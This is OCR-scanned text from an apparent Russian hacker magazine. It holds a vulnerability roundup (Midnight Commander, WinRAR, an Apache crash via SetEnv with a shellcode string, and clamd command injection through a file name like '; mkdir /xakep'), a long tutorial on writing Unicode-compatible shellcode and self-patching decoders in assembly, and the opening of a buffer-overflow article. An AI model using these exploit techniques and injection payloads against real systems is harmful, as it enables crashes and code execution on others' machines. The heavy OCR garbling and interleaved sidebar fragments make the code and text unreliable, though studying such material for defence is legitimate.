архивы. Несмотря на то что баг go- 
вольно старый (сентябрь 2003 года), 
последний МС - 4.6.0 - убивается на- 
повал. Проверено мной лично ;). 

В чем же суть уязвимости? По утве- 
рждениям автора, можно понять, что 
в коде МС не проверяется длина сим- 
волического линка, вытянутого из ар- 
хива. Это навевает некоторые мысли: 
например, если запаковать срайл-сим- 
линк на /аааа (длина более 256 сим- 
волов), МС, не сказав не слова, упа- 
дет в кору ;). Баг затаился в файле 
vfs/direntry.c, в котором используется 
неинициализированный буфер для 
линков. Впрочем, в кору МС можно и 
не валить, а написать грамотный 
эксплоит. Последний должен выпол- 
нять код с правами МС. Хотя, на мой 
взгляд, это не совсем оправданно: ус- 
танавливать Suid-6uT на МС будут раз- 
ве что ламеры или извращенцы :). 

Чтобы убедиться в изьяне, достаточ- 
но стянуть бажный архивчик 1 p://bug- 
gzy.narod.ru/exp.tgz. Попробуй просмот- 
реть его в менеджере. Уверен на 
100%, что дядя Миднайт уйдет в даун. 
Теперь распакуй архив каким-нибудь 
другим архиватором (лучше виндо- 


Баг в ослике 5.0 является первой 
уязвимостью, которая была найдена 
после анализа исходных кодов М5. 
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вым) и увидишь, что дфайл-симлинк 
имеет очень длинное имя. Именно это 
и убивает консольный менеджер. 

Наконец, я не смог обойти мой люби- 
мый архиватор WinRar. Он также уяз- 
вим. Причем баг очень прост: если в 
архиве содержится файл с именем 
длиной более 256 символов, WinRar 
аварийно завершает работу. Изъян 
присутствовал в версиях запаковщи- 
ка аж go релиза 3.10. Переполнение 
происходило при отображении в 
ListView Control Window. Интересно, 
что автор архиватора попросил баго- 
искателей не публиковать никаких 
эксплоитов и РОС-кода, на что ребята 
согласились. Через несколько дней 
вышел последний релиз, в котором 
баг, конечно же, был исправлен. 


НЕПРОВЕРЕННЫЕ КОНФИГИ 

и Довольно забавно, но даже твой 
любимый Apache 1.3.24. попал в спис- 
ки уязвимых приложений. Несмотря 
на то что версия стара, httpd очень 
популярен и установлен на каждом 
пятом сервере ;). Чтобы убить веб- 
сервант на твоем любимом хостинге, 
достаточно объявить переменную 
DATA_LOCALE и задать ее значение в 
размере более 12288 байт. Объявле- 
ние возможно в любом консриге, в 
том числе и в .htaccess-qpamne. Накол- 
басив смертельный конориг, смело 
запрашивай веб-страницу и жди кон- 
чины самого безопасного в мире сер- 
вера. Да, я забыл описать строку в 
конфе. Она должна выглядеть следу- 
ющим образом: SetEnv DATE_LOCALE 
"Х", где Х - строка более 12288 симво- 
лов. Если не хочешь мутить конфиг 
самостоятельно, доверься эксплоиту, 
который сделает черное депо за тебя. 
Вот шелл-код, представляющий баж- 
ную строку: 


char killcode[] = 
"\x31\xc0\xb0\xOFf\x50\x31\xcO\x50" 
"\xb0\x25\x50\xcd\x80" 


Обязательно кликни по ссылке 
http://www.securitylab.ru/31671.html и озна- 
комься с документацией по интерес- 
ной уязвимости. 

Особо занятный баг нашелся в ан- 
тивирусе clamd nog Linux. В конфиге 
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Некролог для Apache 1.3.24 


/etc/clamav.conf используется ди- 
ректива VirusEvent, значение кото- 
рой выполняется в том случае, когда 
будет обнаружен вирус. Так вот: по 
десфолту в VirusEvent загнана строка 
/bin/echo "Virus: %f: Yv" | 
/usr/bin/mail -s "VIRUS ALERT" 
admin@network.net. Переменная %f 
отобразится в виде файла, в KOTO- 
ром найден вирус. На первый 
взгляд, ничего страшного. Но только 
на первый ;). Допустим, хакер запи- 
сал строчку 
"X50!P%@AP[4\PZX54(P*) 
7CC)7}SEICAR-STANDARD- 
ANTIVIRUS-TEST-FILE!ISH+H*" в файл 
с именем "; mkdir /xakep; echo "you 
are lame"|admin@network.net". Затем 
злоумышленник дожидается очеред- 
ного сканирования (а по дефолту 
оно проходит раз в сутки). Строка 
вида ANTIVIRUS-TEST-FILE опознает- 
ся демоном как вирус. После этого 
выполнится директива VirusEvent. 
При этом clamscan попытается вы- 
вести в консоль имя зараженного 
файла. Но, к сожалению, файл не 
проверяется на наличие спецсимво- 
лов, поэтому вывод будет опознан 
как обычная команда. В итоге на мы- 
ло админу улетит целых два письма, 
а в корне системы появится директо- 
рия хакер. Если поиграться с именем 
файла, можно вообще переполнить 
буфер в clamd и аварийно завер- 
шить работу приложения. Однако 
подобные примеры не известны. 
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Ta a ie bree ee LT TU YG ier 
аи фе 


aie: ee sie. 


ee ив ива 


Вирус заказывали? 


БУДЬ БДИТЕЛЕН! 

m Теперь тебе, наверно, понятно, 
что видеосрайл может оказаться 
подставой, мидяха способна сорвать 
крышу у Winamp'a, а архив с секрет- 
ной информацией убивает WinRar. 
Ты должен приучить себя не только 
к хакерской активности, но и к неко- 
торой осторожности. Ты способен на- 
колоть своего приятеля и перепол- 
нить его бусфер (то есть буфер его 
приложений ;)), но помни, что и сам 
можешь стать жертвой соседа-ламе- 
ра. Даже если ты уверен, что откры- 
ваешь достоверный файл, абсолют- 
ная безопасность не гарантирована. 
Обязательно посещай сайты по бе- 
зопасности (xakep.ru, securitylab.ru, securi- 
ty.nnov.ru), а также листай страницы 
твоего любимого журнала, чтобы об- 
рести уверенность в безопасности 
своего софта. 
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UNICODE-BUFFER 
OVERFLOWS 


ПРОБЛЕМЫ ЭКСПЛУАТАЦИИ ФОРМАТА UNICODE 
И НАПИСАНИЕ UNICODE SHELL-KOQOB 


екоего хакера интересовал один сервер, и тут прошел слух, что есть переполнение в одном из демонов. Он написал 
программу, посылавшую вместо пароля строку из 300 букв «А». Уязвимость имела место, но адрес возврата был 
не 0x41414141, а Ox00410041. Хакер и не предполагал, что столкнется с УтсоЧе-переполнением... 


ЧТО ТАКОЕ 


UNICODE 


и Эра компьютеров 


Проверить 
приложение 
очень легко, 
в ASCII 
формате 
символ 
0x00 обоз- 
начает ко- 
нец строки, 
а если прог- 
рамма после 
получения 
0x0041 06- 
работает 
его как 
«А», зна- 
чит, этот 
метод при- 
меним. 


Легко про- 
верить, что 
для указа- 
ния регист- 
ров еах, 
ebx,..., edi B 
операции 
отводится 3 
бита. Сле- 
довательно, 
их можно 
использо- 
вать совме- 
стно с одно- 
байтными 
операциями 
(push, pop, 
xchg ит.о.). 


началась задолго go 
появления интернета. 
Но уже тогда было много людей, кото- 
рые имели отношение к информаци- 
онным технологиям. Однако, так как 
ОС использовали только 8-битные 
ASCII символы, то для локализации 
системы под нужный язык пришлось 
вводить понятие кодировки симво- 
лов. Вскоре каждая страна имела 
свою кодировку, а некоторые, напри- 
мер Россия, даже не одну, а несколь- 
ко :). Но очень быстро (в связи с гло- 
бальным ростом интернета) количест- 
во используемых кодировок сильно 
увеличилось и люди часто просто не 
могли получить нужную информа- 
цию. Назревала необходимость соз- 
дания единой системы, которая бы 
систематизировала этот процесс. И 
тут появился Unicode. Формат Unicode 
очень простой. Он отводит на одну ко- 
дировку ровно 128 символов, сам сим- 
вол представляется двумя байтами. 
Первый байт - это номер кодировки, а 
второй - номер символа. Так, английс- 
кая кодировка имеет индекс 0, а сим- 
Bon «А» - Ox41 в этой кодировке, то 
есть в Unicode буква «А» будет 
0х0041. Именно поэтому хакер полу- 
чил адрес возврата Ox00410041 - сис- 
тема перевела его ввод в Unicode. 


ПРОБЛЕМЫ ЭКСПЛУАТАЦИИ 

ш Очевидно, что эксплуатировать 
уязвимости такого рода в чистом виде 
нельзя. Ведь если передать в shell-Ko- 
де команду 83 C4 2D add esp, 201, то 
он после конвертирования превратит- 
сяв OO 83 00 C4 00 2D add byte ptr 
[ebx+2DOO0C400h], al. А это He совсем 
TO, чего мы ожидаем. Поэтому такие 
уязвимости требуют иного подхода - 
такого, который позволил бы добить- 
ся исполнения shell-Koga, а не бес- 
смысленных команда. Как быть? Один 
из вариантов решения данной проб- 
лемы очень прост. Дело в том, что ес- 
ли мы каким-то образом можем ука- 
зать приложению, что передаваемые 
данные имеют формат Unicode, то оно 
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уже не будет пытаться повторно их 
конвертировать. Но этот метод не 
всегда подходит в силу особенностей 
эксплуатируемых программ. Он может 
подойти к программам, которые обра- 
батывают большие текстовые инфор- 
мационные блоки, например к редак- 
торам, браузерам и т.д. Естественно, 
может случиться и так, что любое дру- 
гое приложение адекватно отреагиру- 
ет на полученные данные, хотя такие 
случаи довольно редки. 


UNICODE ЗНЕЦ.-КОД 

и Поскольку программа преобразо- 
вывает полученные данные в 
Unicode, то нужно написать такой 
shell-kog, который будет работать 
после обработки. Если ты считаешь, 
что это невозможно, то глубоко оши- 
баешься! Конечно, придется отка- 
заться от многих инструкций, некото- 
рых регистров, но shell-Kog может су- 
ществовать! Надо всего лишь подой- 
ти к процессу творчески. Помнишь 
прошлый пример? Его можно напи- 
сать следующим образом: 


00 А5 add ch,dh 

54 push esp 

00 45 00 add byte ptr [ebp],a 
4C dec esp 

00 45 00 add byte ptr [ebp],a 
58 pop eax 

05 00 44 00 01 add eax,1004400h 
00 45 00 add byte ptr [ebp],a 
05 00 01 00 FF add eax,0FFO00100h 
00 45 00 add byte ptr [ebp],a 
50 push eax 

00 45 00 add byte ptr [ebp],a 
44 inc esp 

00 45 00 add byte ptr [ebp],a 
5C pop esp 


Разница в объеме ощутима, HO зато 
какой результат! Все инструкции, сог- 
ласно стандарту, формируют nocnego- 
вательность в формате OxOOXX, где 
ХХ - это какой-либо отличный от нуля 
байт. Думаю, теперь стало очевид- 
ным, что уязвимости такого типа мо- 
гут успешно эксплуатироваться. Но 
возникает другой вопрос: как узнать, 
подойдет ли тебе та или иная инструк- 


ция? Можно, конечно, перебирать оп- 
коды и в конце концов найти все под- 
ходящие. Но лучше поступить иначе. 
Я предполагаю, что тебя в основном 
интересует платформа |A32 (Intel 
Architecture 32). Тогда смело грузишь 
с intel.com доки о командах процессо- 
ра и смотришь, какие из инструкций 
доступны для использования. 


ИСПОЛЬЗОВАНИЕ РЕГИСТРОВ 
m В первую очередь определись с 
регистрами. Тут все зависит от опера- 
ций, в которых они принимают учас- 
ТИЕ, а, точнее, от их размера. Напри- 

мер, push занимает 5 бит. Если ис- 
пользовать его с 32-битными регист- 
рами, то эта операция будет занимать 
всего лишь один байт. 

Также тебе доступны регистры г8 
(ah, al, bh, Ы...). Вопрос о пригодности 
решается в зависимости от команд и 
регистров. Поэтому достаточно ска- 
зать, что в общем случае ты можешь 
использовать все r32 и г8 регистры. 
Естественно, некоторые операции не 
могут подойти из-за своего размера 
или же операнда/операнодов. Но уже 
сейчас заверю тебя, что 116 (ах, bx, 
CX...) использовать не получится, OG- 
нако, изменяя регистры Г8 и гЗ2, ты 
все-таки неявно контролируешь 16. 
Хотя, я думаю, этого запаса тебе бу- 
дет вполне достаточно. 


РАБОТА С ПАМЯТЬЮ 

m С регистрами определились, те- 
перь поговорим об их использовании. 
Команда Mov значительно урезана 
из-за наложения на нее ряда ограни- 
чений. Пересылка данных из регистра 
в регистр в читаемом виде невозмож- 
на. То есть mov eax,ebx ты не вос- 
пользуешься (правда, это можно 
обойти, например, используя команду 
xchg или стек). Зато стали доступны 


кое-какие другие ее возможности: 
89 00 mov dword ptr [eax],eax 

8B 00 mov eax,dword ptr [eax] 

88 00 mov byte ptr [eax],al 

8A 00 mov al,byte ptr [eax] 

8C 00 mov word ptr [eax],es 

8E 00 mov es,word ptr [eax] 


Также можешь использовать ее для 
работы с памятью, указав адрес в ка- 
честве приемника или источника. Но 
помни: так как Shell-Kog находится в 
Unicode, то используемые адреса 
должны быть оформлены соответ- 
ственно, то есть для работы с па- 
мятью тебе необходимо использовать 
адреса вида OxXXOOXXO0. 


AO 00 ХХ 00 ХХ mov al,byte ptr 
ds:[XX00XX00h] 

Al 00 ХХ 00 XX mov eax,dword ptr 
ds:[XX00XX00h] 

A2 00 XX 00 XX mov byte ptr 
ds:[XXO0OXXO0h],al 

A3 00 XX 00 XX mov dword ptr 


ds:[XXOOXXOOh],eax 


Кроме всего этого, есть еще команда 
копирования строк: A4 movs byte ptr 
[edi],byte ptr [esi]. BoT и весь джентльме- 
нский набор для команды Mov. Kak ви- 
дишь, эта команда подходит для работы 
с памятью, а значит, может быть ис- 
пользована для изменения определен- 
ных областей программы или стека. Так- 
же помни о возможностях добавления 
г8 регистров к любой области памяти: 


00 00 add byte ptr [eax],al 
0003 add byte ptr [ебжа! 
00 20 add byte ptr [eax],ah 

add byte ptr [ebx],ah 


00 23 
и инкрементирования данных в па- 
MATH: 


FF 00 
FE 00 


inc dword ptr [eax] 
inc byte ptr [eax] 


Этих вариантов достаточно для 
модификации памяти. Но можно 
прибегнуть еще к одной хитрости. 
Надо изменить регистр езр, так, что- 
бы он указывал на ту область, кото- 
рую нужно изменить, + объем изме- 
няемых данных, а дальше записы- 
вать в стек все необходимые дан- 
ные в обратном порядке. 


ВЫРАВНИВАНИЕ КОДА 


Принцип работы декодера 


МАТЕМАТИЧЕСКИЕ ОПЕРАЦИИ 
НАД ЧИСЛАМИ 

м Используя операцию mov, можно 
заносить в г32 регистры нужные дан- 
ные. Но опять не все так просто. Зано- 
сить можно исключительно числа в 
формате OxXXOOXXO0: B8 00 ХХ 00 
XX mov eax,OXXOOXXOOh. Такие же 
ограничения поставлены и Ha опера- 
цию add gna r32 регистров: 05 00 ХХ 
ОО ХХ add eax,OXXOOXXOOh. 

Также у тебя есть все возможности, 
чтобы воспользоваться суммировани- 
ем данных в г8 регистрах: 


00 63 


add bl,al 
00C7 add bhaal 
0063 add blah 
00E7 add bh,ah 


Для зануления регистров г8 ты мо- 
жешь использовать: 


BO 00 mov al,0 
В 00 mov cl,0 
B4 00 mov ah,0 
В5 00 mov ch,0 


Можно также закинуть в стек нуль и 
забрать в какой-либо регистр. Если 
тебе придется использовать опера- 
цию XOR, то имей в виду, что она под- 


Ш Для того чтобы эксплоит работал в формате Unicode, каждый 
второй его байт должен быть нулевым. Более того, иногда для 
прыжков или вычислений своей позиции мы манипулируем некото- 
рыми числами, а бывает так, что нам важна их позиция, кратность 
адреса какому либо числу и т.д. В таких случаях в обычных shell- 
кодах используют поры. Но в Unicode они их использовать нельзя, 
поэтому приходиться искать заменители: 

00 45 00 add byte ptr[ebp+0x0O], а! 

04 00 add al,OxO 

00 EC add ah, ch; ecx =O 

Если тебя интересует полный список, TO ты сможешь найти его Ca- 
мостоятельно, проанализировав байт-коды допустимых к исполь- 
зованию команд. 


ходит только для модификации реги- 
стра eax, причем второй операнд дол- 
жен иметь вид OxXXOOXXOO (далее 
просто UnicodeDW). 

Если тебе показалось, что эти мето- 
ды ничего конкретного не дают, спе- 
шу тебя разуверить. Да, они урезаны, 
но вместе открывают возможность 
манипуляции с любыми числами. Ва- 
риантов множество, и к ним мы еще 
вернемся, а пока продолжим изуче- 
ние доступных нам команд. 


РАБОТА CO СТЕКОМ 
m В стек ты можешь записывать все 
ГЗ2 регистры: 


50 push eax 
53 push ebx 


Можешь записывать числа в фор- 
мате UnicodeDW и нуль: 


68 00 FF 00 FF 
6A 00 


push OFFOOFFOOh 
push 0 


С помощью команды рор имеешь 
возможность забирать данные со сте- 
ка в любой r32 регистр: 58 pop eax, 
сохранять в стеке состояния всех ре- 
гистров или же загружать их оттуда: 


61 popad 
60 pushad 


Эти операции очень удобны, если не- 
обходимо одновременно изменить 
значения многих регистров. Их приме- 
нение я продемонстрирую в shell-Koge. 


ИСПОЛЬЗОВАНИЕ НАШИХ 
ВОЗМОЖНОСТЕЙ 

m Теперь перейдем непосредствен- 
но к написанию shell-Koga. 

Для начала пишем небольшую 
программу, которая будет средой оби- 
тания нашего shell-Koga. 


int _tmain(int argc, TCHAR* агд\[)) { 
_asm { 
call set_stack_pointer_to_eip 
set_stack_pointer_to_eip: 
pop esp 
/* ESP now point to the start address of 
shellcode: */ 
// TODO: shellcode here :) } 
return 0; } 


» 


Для опера- 
ций вычи- 
тания goc- 
таточно go- 
бавлять 
числа, ко- 
торые даль- 


ше 
Ox7FFFFFFF. 


Помни, что, 
когда изме- 
няются 
младшие 
разряды г8, 
старшие ос- 
таются не- 
изменными, 
то есть ес- 
ли ты доба- 
вишь K 
OxOOFF 
один байт 
Охо1, то pe- 
зультатом 
будет 
Ox0000, a 
не 0x0100. 
Осторожно 
относись к 
таким опе- 
рациям. 
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Het 
проблем и с 
инкремента- 
цией/декре- 
ментацией 
r32 
регистров. 
40 inc eax 
48 dec eax 


Стек можно 
использо- 
вать для 
модифика- 
ции памяти 
или чтения 
из нее. Ма- 
нипулируя 
esp, можно 
делать 
сдвиги в 
числах на 1 
байт - 
очень удоб- 
но, если на- 
gO изменить 
значение 
регистра на 


не 
UnicodeDW- 
формат. 


UNICODE-BUFFER OVERFLOWS ) 


Мы предполагаем, что переполняе- 
мый Oycpep находится на вершине 
стека, поэтому ер = esp. Чтобы не пи- 
сать весь Shell-Kog в Unicode, ты мо- 
жешь использовать старые заготовки 
стандартных shell-Kogos. Правда, пос- 
ле конвертирования они перестанут 
работать. Поэтому следует написать 
декриптор в Unicode так, чтобы он 
превращал свою вторую часть (ос- 
новной °Не!-код) в нормальный вид. 
Для этого самым экономным и прос- 
тым вариантом будет создание алго- 
ритма для считывания 2 байт 
(\xO0\x[kog]) из стека и записи второ- 
го байта в область памяти, доступную 
для записи (см. скрин "Принцип 
работы декодера”). 

Схема реализации очень проста, но 
для того чтобы написать такой деко- 
дер в стандартном виде, требуется ис- 
полнить следующие команды: 


‚ебх=1 

; eax = address of encoded shellcode 

; esp = address for decoded shellcode 
; есх = length of shellcode 

Decoder: 

43 inc ebx 

8A1458 mov di,byte ptr [eax+ebx*2] 
88 141C mov byte ptr [esp+ebx],dl 
ЕВЕ loop Decoder 


Как ты можешь заметить, это мало 
похоже на Unicode-cpopmat. А ведь де- 
кодер должен быть написан так, что- 
бы после обработки он стал рабочим. 
В то же время, если его конвертиро- 
вать, то получится следующее: 


43 inc ebx 
008400140058 add byte ptr 
[edx+58001400h], cl 
add byte ptr 
[eax+1C001400h],cl 
add dl,ah 

add bh,dh 


00 88 00 14 00 IC 


00 Е? 
00 F7 


Поэтому надо поступить иначе. Наш 
декодер занимает 8 байт: 


Code: 43 8A 14 58 88 14 IC Е? ЕТ - 0х08 
bytes 

Unicode: 43 00 8A 00 14 00 58 00 88 00 14 
00 1C 00 E2 00 ЕТ - Ox10 bytes 


Если пропустить в нем каждый BTO- 
рой байт, то после дформатирования 
он будет иметь размер ровно 8 байт с 
одной только разницей, что каждый 
второй байт будет нулевым: 

Code: 43 14 88 IC F7 - 0x05 bytes 

Unicode: 43 00 14 00 88 00 IC 00 F7 - 
0x08 bytes 


После таких операций мы потеряли 
ровно 4 байта. На данном этапе дек- 
риптор нельзя назвать рабочим. Что- 
бы его можно было использовать, 
придется вспомнить о доступных опе- 
рациях (соблюдая формат), например, 
о модификации памяти (patching). 
Действительно, если ты знаешь мес- 
тонахождение декодера в памяти, то 
можешь легко изменить нужные бай- 
ты. В данном случае надо поменять 
нули на соответствующие их позици- 
ям байты в shell-Koge: 


Code : 43 14 88 1С F7 - 0x05 bytes 

Unicode: 43 00 14 00 88 0016 00 ЕТ - 0x08 
bytes 

Patch : +8A +58 +14 +E2 

Decoded: 43 8A 14 58 88 14 IC Е? ЕТ - 0x08 
bytes 


Таким образом, чтобы заставить де- 
кодер работать, надо заменить 4 бай- 
та. Согласно формату, эту операцию 
можно проделать так: 


; eax = address of decoder 


40 inc eax 
00 45 00 add byte ptr [ebp],al 
40 inc eax 
00 45 00 add byte ptr [ebp],al 


mov byte ptr [eax],OxXX 
add byte ptr [ebp],al 


Поясню, что делает этот фрагмент 
кода. В регистре еах находится адрес 
нерабочего декодера, код которого 
необходимо изменить. Так как после 
форматирования декодер имеет на 
каждой второй позиции нули, то нам 
необходимо всегда смещаться на два, 
чтобы попадать на те места в памяти, 
которые требуется изменить. После 
двойного инкрементирования регист- 
ра еах он указывает на некую область 
памяти. Если теперь взглянуть на 
младший разряд числа, на которое 
указывает еах, то там будет как раз 
тот нуль, от которого следует изба- 
виться. Поэтому следующим шагом 
будет запись туда нужного тебе чис- 
ла. К сожалению, эту процедуру нель- 
зя вынести в цикл, потому что любой 
цикл (loop, loopnz, са! и т.д.) требует 
указания смещения, на которое будет 
идти прыжок, a Unicode требует, что- 
бы второй байт команды был нуле- 
вым. Получается, что ты все-таки мо- 
жешь использовать циклы, но только 
на один байт вперед. Операция add 
byte ptr [ebp],al используется только 
для приведения shell-Koga к Unicode- 
формату. Графически модификация 
декодера показана на скрине 
"Процесс перепрошивки декодера". 
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Принцип работы декодера 


ПАТЧ ДЛЯ ДЕКОДЕРА И 
НАСТРОЙКИ 


; Patch for decoder 

004500 add byte ptr [ebp],al 
(600 8A mov byte [eax],0x8A 
004500 add byte ptr [ebp),al 
40 inc eax 

004500 add byte ptr [ebp),al 
40 inc eax 

004500 add byte ptr [ebp],al 
(60058 movbyte ptr byte [eax],0x58 
004500 add byte ptr [ebp],al 
40 inc eax 

004500 add byte ptr [ebp],al 
40 inc eax 

004500 add byte ptr [ebp],al 
C6 00 14 mov byte [eax],0x14 
004500 add byte ptr [ebp],al 
40 inc eax 

004500 add byte ptr [ebp],al 
40 inc eax 

004500 add byte ptr [ebp],al 
(600Е? mov byte [eax],0xE2 
004500 add byte ptr [ebp],al 
40 inc eax 

004500 add byte ptr [ebp],al 


Настройки для shell-Koga: 
40 inc eax 


004500 add byte ptr [ebp],al 
6A 00 push 0 

5B pop ebx 

004500 add byte ptr [ebp],al 
43 inc ebx 

004500 add byte ptr [ebp],al 
50 push eax 

004500 add byte ptr [ebp],al 
5C pop esp 

004500 add byte ptr [ebp),al 
6A 00 push 0 

004500 add byte ptr [ebp),al 
59 рор есх 

ВА 00 34 00 FF mov edx,0FF003400h 
00 FI add cl,dh 

004500 add byte ptr [ebp),al 


Осталось определить адрес, по кото- 
рому находится декодер. Если учесть, 
что код исполняется в стеке приложе- 
ния, то патч где-то на вершине этого 
стека. Относительно него и делаются 
все смещения, так как он неизменного 
размера. То же самое касается и деко- 
дера. Его размер используется для по- 
иска основного Shell-koga (“main shell- 
code”). Ho для начала его работы тебе 
надо занести настроечные данные в 
регистры: eax - адрес декодера, eax - 
адрес shell-Koga в памяти, есх - длина 
shell-koga, esp - адрес для записи. 

Первым делом определим адрес де- 
кодера в памяти. Он должен нахо- 
диться где-то после патча. Поэтому 


Процесс перепрошивки декодера 


можно допустить, что его смещение 
будет не больше чем OX7F байт. A 
поскольку весь зВе!-код находится в 
начале стека, то несложно записать в 
еах его адрес: 


; Get start of shellcode 


54 push esp 

00 45 00 add byte ptr [ebp],al 
4c dec esp 

00 45 00 add byte ptr [ebp],al 
58 pop eax 

00 45 00 add byte ptr [ebp],a 
05 00 OF 00 01 add eax,l000F00h 
00 45 00 add byte ptr [ebp],a 
05 00 01 00 FF eax,0FFO00100h 

00 45 00 add byte ptr [ebp],a 
50 push eax 

00 45 00 add byte ptr [ebp],a 
44 inc esp 

00 45 00 add byte ptr [ebp],a 
58 pop eax 


Здесь ты указал, что смещение к ge- 
кодеру Ox10. Это значение ты изме- 
нишь, когда узнаешь длину всего ко- 
да, который будет находиться перед 
декодером. А там будут патч для деко- 
дера и его настройки. 

Теперь тебе известно, что все наст- 
ройки к декодеру занимают Ox7D 
байт. Следовательно, меняешь в бло- 
ке строку 05 OO OF 00 01 add 
еахЛОООГООП на строку 05 00 7С 00 
01 add eax,1007COOh. Тогда собствен- 
но сам декодер: 


; Bad formatted decoder 


43 inc ebx 
14 88 adc al,88h 
1C Е sbb al,OF7h 


После декодера идет shell-Kog, ко- 
торый будет расшиофрован и испол- 
нен. Это может быть код, открываю- 
щий порт gna shell’a, или же скачива- 
ние и запуск произвольного файла. 
Короче, все что угодно. Но такой 
подход к написанию shell-Koga очень 
громоздкий. В результате ты полу- 
чишь, мягко говоря, огромный деко- 
дер. А это неинтересно, так как в 
большинстве случаев объем shell-Ko- 
да ограничен. 


ОПТИМИЗАЦИЯ ДЕКОДЕРА 
и Чтобы немного упростить anro- 
ритм, мы в качестве адреса для за- 


писи декодированного shell-Koga 
взяли адрес прямо за декодером. 
Это избавило нас от необходимости 
делать вызовы на него, потому что 
он исполняется сразу после рас- 
шифровки. К тому же, мы не должны 
выбирать заранее определенное 
место для записи зПе!-кода, что де- 
лает его более переносимым. 

Но давай попробуем оптимизиро- 
вать наш Shell-koga. Обрати внима- 
ние на команду A4 movs byte ptr 
[edi],byte ptr [esi]. Она предназначе- 
Ha для копирования байт из адреса 
esi в edi. Команда очень удобна, ес- 
ли учесть, что ее объем составляет 
всего лишь один байт. Вспомни 
принцип работы декодера: он копи- 
рует из одного адреса в другой, 
просто адрес источника увеличива- 
ется на 2, а He Ha 1. Операция Movs, 
автоматически инкрементирует esi и 
edi, чтобы обеспечить копирование 
строк в циклах. Но если после нее 
дополнительно увеличить esi Ha 1, TO 
принцип работы станет таким же, 
как и у декодера! Вставив этот про- 
цесс в цикл, ты получишь наш деко- 
дер в Unicode: 


Decoder: 

A4 movs byte ptr [edi], byte ptr [esi] 
00 45 00 add byte ptr [ebp],al 
46 inc esi 

00 45 00 add byte ptr [ebp],al 
E2 F6 loop Decoder 


Количество итераций зависит OT 
значения, занесенного в есх (как и в 
прошлом shell-Koge), то есть есх - это 
длина shell-Koga. В esi и edi должен 
храниться адрес начала shell-Koga. 
Остался один вопрос: каким образом 
организовать цикл, ведь операция 
loop занимает два отличных от нуля 
байта? Можно опять патчить деко- 
дер, но это увеличит размер. Давай 
схитрим. Наш декодер копирует shell- 
код, удаляя из него нули, поэтому 
после декодировки рабочий shell-Kog 


zie Та левы. 


Декодер патчит сам себя 


окажется прямо за декодером. Мы не 
замкнем цикл декодера и оставим 
его в таком виде: 


Decoder: 

A4 movs byte ptr [edi],byte ptr [esi] 
00 45 00 add byte ptr [ebp],al 
46 inc esi 

00 45 00 add byte ptr [ebp],al 
E2 00 loop Shellcode 
Shellcode: 


Таким образом, после первой итера- 
ции управление переходит на shell- 
код, потому что esi и edi указывают 
прямо на него. А что если edi будет 
указывать Ha операнд операции loop? 
Тогда первый байт shell-Koga будет за- 
писан операндом к loop и повлияет на 
исполнение декодера. Причем повли- 
яет сразу при первой итерации, так 
как исполнится поуз, которая изме- 
Hut loop. И ход исполнения декодера 
в этот момент может измениться. Бо- 
лее того, если первый байт shell-Koga 
будет OxF6, то цикл замкнется. 

Значит, можно сделать декодер, ко- 
торый пропатчит сам себя и таким об- 
разом замкнет цикл расшифровки 
shell-koga. Достаточно только перед 
декодируемым shell-kogom указать 
смещение для прыжка и подправить 
стартовые настройки: есх - длина 
shell-koga + 1, edi - адрес операции 
loop +1, esi - адрес shell-Koga. 

Таким образом, нам удалось напи- 
сать декодер для основного shell-Ko- 
да, уложившись всего в 6 байт + наст- 
ройки для его работы. Я думаю, это 
неплохой результат :). 


ФОРМАТ UTF-8 И ДРУГИЕ 

m Часто данные конвертируются не 
только в Unicode, но и в такие срорма- 
ты, как UTF-4, UTF-8, UCS, EUC ит.д. В 
этом случае появляются и другие огра- 
ничения, и новые возможности. Жаль, 
что объем статьи не позволяет расска- 
зать об этом подробно. Но если эта те- 
ма кого-то заинтересует, то мы еще к 
ней вернемся. А на этом пока все. 


Иногда, ес- 
ли ты пере- 
полняешь 
данные в 
памяти, 
весьма воз- 
можно, что 
ты переза- 
пишешь и 
esp. Может 
быть и так, 
что пере- 
полнение 
происходит 
не в стеке. 
В таких 
случаях те- 
бе придется 
самостоя- 
тельно ис- 
кать свое 
местополо- 
жение. 


Unicode formated shelloode: 


В результате мы получили очень маленький декодер 
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ПЛАТФОРМА. 
OVERFLOW. ВЛАСТЬ: 


ПЕРЕПОЛНЕНИЕ БУФЕРА В СИСТЕМАХ WINDOWS И *NIX 


чем состоит механизм атак на переполнение буфера? Как, используя банальную ошибку, получают удаленные 
шеллы рута и админа для, казалось бы, защищенных систем Windows и *nix? Ответы найдешь ниже. 


амо переполнение бу- 


cpepa в программе не 


так страшно. Эта ошиб- 


ка - лишь досадная оп- 
лошность, порой никак 
не влияющая на работу приложения. 
Максимальный вред от такой оплош- 
ности - остановка процесса програм- 
мы, дамп памяти на винчестере и все. 
"И все-таки, почему ошибке перепол- 
нения буфера присваивают высокий, 
а часто даже критический статус?" - 
спросишь ты. Ответ прост: ошибка бе- 
зобидна только для случаев, когда 
переполнение не используется умыш- 
ленно, заранее подготовленным и от- 
лаженным методом. Намеренное пере- 
полнение буфера системного процес- 
са несет головную боль админам и 
пользователям ;-). 


ЦЕЛЬ ДЛЯ ВЗЛОМА 


ых 


Ss Sa ps aS 
a an la. 


Сердце администрирования Виндов 


возможности, давай рассмотрим мо- 
дель безопасности каждой из ОС. 


oc WINDOWS 
и Это самая распространенная Ha 


только те права на доступ, которые 
даны самому пользователю. Очень 
редкие эксплоиты и вирусы исполь- 
зуют переполнения буфера в "поль- 
зовательских" программах. Учетных 


Очень ма- сегодня система. О ее глючности и записей из группы "Пользователи" 
лое количе- m Далеко не каждое переполне- слабой модели пользовательских может даже не существовать. Пос- 
А ние интересует кракеров и вирмей- привилегий говорить не будем. Пока- ледним доступным для использова- 
тает с соф- керов. Например, их практически не жем только распределение привиле- ния является уровень группы "Адми- 
ви волнуют ошибки программистов в гий в системе. На низшей ступени ие- нистраторы" ("Administrators"). Полу- 
функции малоиспользуемых программах. Та- рархии ОС стоит учетная запись чение прав администратора - одна из 
м al кими ошибками будут заниматься "Гость" ("Guest"). Она есть в системе самых желанных целей взломщика. 
серьезным хакеры - оля них это удовольствие, всегда, ее можно только заблокиро- Эта учетная запись может выполнять 
препятстви- а не работа или способ прославить- вать, но не удалить. Чаще всего эта практически все функции в системе. 
ма ся. Также не представляют особого учетка отключена и не имеет пароля. Получить привилегии уровня можно 
ков. интереса переполнения в програм- Она предполагает минимально воз- через уязвимость в программах, за- 


мах, которые не имеют повышенных 
привилегий. Здесь достаточно 
вспомнить теорию переполнения 
буфера: у программы с ошибкой 


можные привилегии во всей системе. 
Приложения, запущенные от "Гость", 
